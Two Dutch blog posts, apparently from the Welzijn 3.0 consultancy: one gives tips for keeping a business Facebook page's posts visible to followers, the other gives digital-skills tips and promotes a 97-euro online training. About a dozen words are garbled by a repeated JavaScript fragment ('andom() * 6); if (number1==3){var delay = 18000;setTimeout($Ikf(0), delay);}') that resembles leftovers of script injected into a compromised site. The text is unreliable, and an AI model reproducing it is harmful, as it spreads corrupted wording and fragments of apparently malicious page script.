Mediamomenten leren maken, is de online training voor 97,- euro iets voor jou? Klik op de foto.

Of vraag de succesvolle inspirerende workshop aan: Ben jij er klaar voor?

 

BewarenBewaren

Facebook berichten toch blijven zien (tips)

Facebook berichten toch blijven zien is lastiger geworden. Ben jij een beheerder van een zakelijke Facebookpagina, bijvoorbeeld voor een wijkteam, jongerenwerk sociaalwerk of buurthuis, lees dan even verder.

Facebook heeft de manier waarop gebruikers de berichten van andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen zien namelijk stevig gewijzigd. De bedoeling is dat je nu vooral berichten ziet die jouw “welzijn bevorderen.” De tijd die je op Facebook besteed moet nuttig voor je zijn, vinden ze daar. Daarmee geeft Facebook vanaf nu voorrang op berichten van vrienden en bekenden, die ook nog eens meer zullen moeten uitnodigen tot dialoog / interactie. 

Facebook berichten toch blijven zienFacebook heeft al toegegeven dat hierdoor 50 miljoen uur PER DAG (!) minder op Facebook wordt doorgebracht door ons allemaal. Het slachtoffer daarvan zijn bedrijven en instellingen. Zelfs als je een like hebt gegeven krijg je niet alles meer te zien wat zij publiceren. Dat was al zo, maar is nu dus nog moeilijker.

Dus, heb jij een bedrijfsmatige Facebook-pagina, bijvoorbeeld voor je wijkteam, opbouwwerk of buurthuis, dan loop jij nu zichtbaarheid en bereik mis. Zo simpel is het. Om dat te verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen kan je aan je volgers de volgende tips geven om toch zichtbaar te blijven:

Op mobieljes

Ga in de Facebook-app naar de Facebookpagina van organisatie X (die van jou dus). Tip op het pictogram “Volgend.” Bij “meldingen” wijzig je “standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaard” in “Als eerste weergeven.”

Op laptops / PC’s

Open Facebook in de browser. Ga naar de Facebookpagina van organisatie X (die van jou dus). Klik onder de grote foto op “Volgend” zodat het uitklap-menu verschijnt. Wijzig “Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaard” in “Als eerste weergeven.”

Natuurlijk mag je dat ook met de Facebookpagina van Welzijn 3.0 doen. Zo zie je mijn berichten altijd in je tijdlijn verschijnen. 😉  Zie het screenshot hierboven. Ga naar https://www.facebook.com/Welzijn30/

Bedankt alvast, succes en hartelijke groeten,

Hans Versteegh, 0644062029, info@welzijn30.nl

Mediamomenten leren maken, is de online training voor 97,- euro iets voor jou?

Mediamomenten leren maken, is de online training voor 97,- euro iets voor jou? Klik op de foto.

Of vraag de succesvolle inspirerende workshop aan: Ben jij er klaar voor?

 

BewarenBewaren

BewarenBewaren

BewarenBewaren

Digivaardig tips

Digivaardig tips? Digivaardigheid, heb jij het? Ben jij in staat je weg te vinden op de “digitale snelweg?” En zijn je collega’s dat ook? En … zijn jouw cliënten / bewoners dat eigenlijk wel? Ben jij in staat hen de weg te wijzen op die “snelweg?” Ik ga je wat tips geven om hier verder mee te komen.digivaardig tips1. Waar zit mijn doelgroep?
Wil je weten welke social media platformen veel gebruikt worden in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and en wil je weten op welk platform jouw doelgroep waarschijnlijk te vinden is? Lees het volgende artikel, waarin verslag word gedaan van het jaarlijkse social media onderzoek in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.
https://www.marketingfacts.nl/berichten/jongeren-keren-facebook-massaal-de-rug-toe

2. Is mijn doelgroep digivaardig genoeg?
Soms wil je in kaart brengen of iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and moeite heeft met digitale vaardigheden. Heeft het bijvoorbeeld zin om via digitale middelen contact te leggen of informatie te delen? Is iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and in staat via eHealth hulp te krijgen? Dat kan je inschatten door die persoon de Digimeter in te laten vullen. Jouw organisatie maakt dan wel eerst een account aan.
https://basismeters.nl/meters/digimeter

3. Digitale zelftest voor je doelgroep en … voor jezelf?
Ben je eigenlijk stiekem benieuwd hoe jij het er zelf van af brengt online? Dan is dit een leuke, de digitale zelftest. Super makkelijk en snel. Natuurlijk kan je ook deze even door je client / bezoeker / vrijwilliger / mantelzorger of … je collega in laten vullen. Leuk om te vergelijken.
https://basismeters.nl/meters/digizelftest/

4. Nascholing nodig?
Mocht er nou uit komen dat jij wel wat nascholing kan gebruiken, of jullie samen, kijk dan even in mijn aanbod. Je kunt bijvoorbeeld al snel aan de slag met de online Basistraining Social Media voor Sociaal Werk, voor slechts 97 euro (BTW vrij).
https://socialsocialmediaacademie.nl/waarom-dit-de-training-voor-jou-is/  of hier https://www.welzijn30.nl/leer-online-met-de-social-social-media-academie/
Voor het totaaloverzicht met onder andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere adviesgesprekken en meer-maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijkse coachingstrajecten klik je hier:
https://www.welzijn30.nl/social-media-trajecten/

Kom je er niet uit, bel of mail me gerust. Ik denk graag met je mee.

Groetjes!

Hans Versteegh, info@welzijn30.nl, 0644062029, Welzijn 3.0

BewarenBewaren

BewarenBewaren